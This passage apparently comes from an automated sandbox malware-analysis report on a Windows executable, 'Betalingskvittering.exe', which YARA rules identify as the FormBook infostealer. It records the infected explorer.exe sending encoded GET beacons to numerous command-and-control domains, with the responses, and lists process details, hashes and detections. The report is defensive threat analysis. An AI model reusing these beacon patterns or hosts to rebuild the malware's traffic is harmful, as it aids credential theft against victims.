Oct 27, 2021 17:50:36.047425985 CEST	1429	OUT	GET /b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ== HTTP/1.1 Host: www.bobazzing.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 17:50:36.225481033 CEST	1436	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 27 Oct 2021 15:50:36 GMT Content-Type: text/html Content-Length: 275 ETag: "61774856-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49790	50.87.176.30	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 17:50:42.019907951 CEST	2045	OUT	GET /b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X HTTP/1.1 Host: www.improvfilmproduction.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 17:50:42.196352959 CEST	2046	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Oct 2021 15:50:42 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49796	35.186.238.101	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 17:50:47.258801937 CEST	4624	OUT	GET /b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA== HTTP/1.1 Host: www.olympiaapartment.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 17:50:47.373639107 CEST	5749	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 27 Oct 2021 15:50:47 GMT Content-Type: text/html Content-Length: 275 ETag: "6175c221-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49802	192.0.78.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 17:51:02.783266068 CEST	7472	OUT	GET /b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X HTTP/1.1 Host: www.malatirada.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 17:51:02.800110102 CEST	7472	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 27 Oct 2021 15:51:02 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.malatirada.com/b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X X-ac: 2.hhn _dfw Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49815	104.21.40.182	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 17:51:07.874152899 CEST	7500	OUT	GET /b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ== HTTP/1.1 Host: www.finansresultation.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 17:51:07.902292013 CEST	7501	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 27 Oct 2021 15:51:07 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 27 Oct 2021 16:51:07 GMT Location: https://www.finansresultation.com/b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ== Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xtsbOpdAt06UwAXrS53vqDQTVQjPXF%2Fh7AxN6D%2FoMS7RB7d5EBKii2f2vPoymx%2FAhanGl0LnlQVx19Pr9H6q96ogsKrUYEnkdLSP2Ki72%2FS7p%2F%2BST0DNmwdjXpEGCKSf2LbcL%2BmXsWl8CB4u"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a4d15823f7442e1-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49829	104.21.45.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 17:51:12.964931965 CEST	7536	OUT	GET /b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X HTTP/1.1 Host: www.rxgmarket.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 17:51:13.296627045 CEST	7537	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Oct 2021 15:51:13 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bz3Z9xDKX9qXLWedJeYbmqe4wi2s4eO3jBbJQMiMyNHDIEsXgBZ7mHx2nwoUFffwMZYPSWVaKAbLAX3R7%2F6l%2FOwe3bPbgDMXRJvrUpWhVkm4%2BufBQexlKs5sYLWh88gtWNOc0g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a4d15a21fe05bf1-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 31 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 78 67 6d 61 72 6b 65 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 107<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rxgmarket.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49833	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 17:51:18.361021996 CEST	7546	OUT	GET /b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og== HTTP/1.1 Host: www.joystoreworld.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 17:51:18.402849913 CEST	7547	IN	HTTP/1.1 403 Forbidden Date: Wed, 27 Oct 2021 15:51:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: -1 X-Request-ID: d3f121e3-1b05-4bdd-beea-f59c42222099 X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Content-Type-Options: nosniff X-Dc: gcp-europe-west1 CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 6a4d15c3ce834e0e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49834	142.4.98.67	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 17:51:23.665467978 CEST	7553	OUT	GET /b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X HTTP/1.1 Host: www.bbyyn10.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 17:51:23.857836962 CEST	7554	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 27 Oct 2021 15:48:07 GMT Content-Type: text/html;charset=utf8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 66 32 0d 0a 3c 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e e6 a3 80 e6 b5 8b e4 b8 ad 3c 2f 74 69 74 6c 65 3e 3c 64 69 76 3e e8 b7 b3 e8 bd ac e4 b8 ad 3c 2f 64 69 76 3e 3c 2f 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 22 2f 62 30 75 73 2f 3f 45 52 2d 74 48 6a 52 3d 75 76 78 41 72 52 6b 44 46 51 49 61 37 55 48 35 77 54 7a 57 79 41 47 64 6a 37 58 4b 38 79 77 75 70 77 52 6a 59 57 36 37 7a 41 37 54 6c 43 37 5a 7a 7a 6f 52 66 57 6b 31 78 48 4f 2f 54 4d 6c 2b 6c 49 6c 63 61 36 52 46 4b 77 3d 3d 26 37 6e 42 3d 6f 34 38 58 26 62 74 77 61 66 3d 37 36 31 39 32 33 35 39 22 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: f2<html><meta charset="utf-8" /><title></title><div></div></html><script> window.location.href ="/b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X&btwaf=76192359"; </script>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49835	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 17:51:28.908404112 CEST	7555	OUT	GET /b0us/?7nB=o48X&ER-tHjR=twm/1Bp31EH0Ih+sIHhgkxpvXOzGUgtw6+dZfZW7p7V/jiZPQGLQCd1AR8vD1TjU5s4Zo4ED0Q== HTTP/1.1 Host: www.inkedbreadcompany.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 17:51:29.023747921 CEST	7555	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 27 Oct 2021 15:51:28 GMT Content-Type: text/html Content-Length: 275 ETag: "61774872-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49836	198.54.117.217	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 17:51:34.243393898 CEST	7556	OUT	GET /b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X HTTP/1.1 Host: www.insularrofioa.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Betalingskvittering.exe PID: 6364 Parent PID: 1612

General

Start time:	17:49:31
Start date:	27/10/2021
Path:	C:\Users\user\Desktop\Betalingskvittering.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Betalingskvittering.exe'
Imagebase:	0x400000
File size:	334436 bytes
MD5 hash:	FF904170AD5767DB6B6066400972CC99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: Betalingskvittering.exe PID: 6404 Parent PID: 6364

General

Start time:	17:49:32
Start date:	27/10/2021
Path:	C:\Users\user\Desktop\Betalingskvittering.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Betalingskvittering.exe'
Imagebase:	0x400000
File size:	334436 bytes
MD5 hash:	FF904170AD5767DB6B6066400972CC99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3440 Parent PID: 6404

General

Start time:	17:49:37
Start date:	27/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
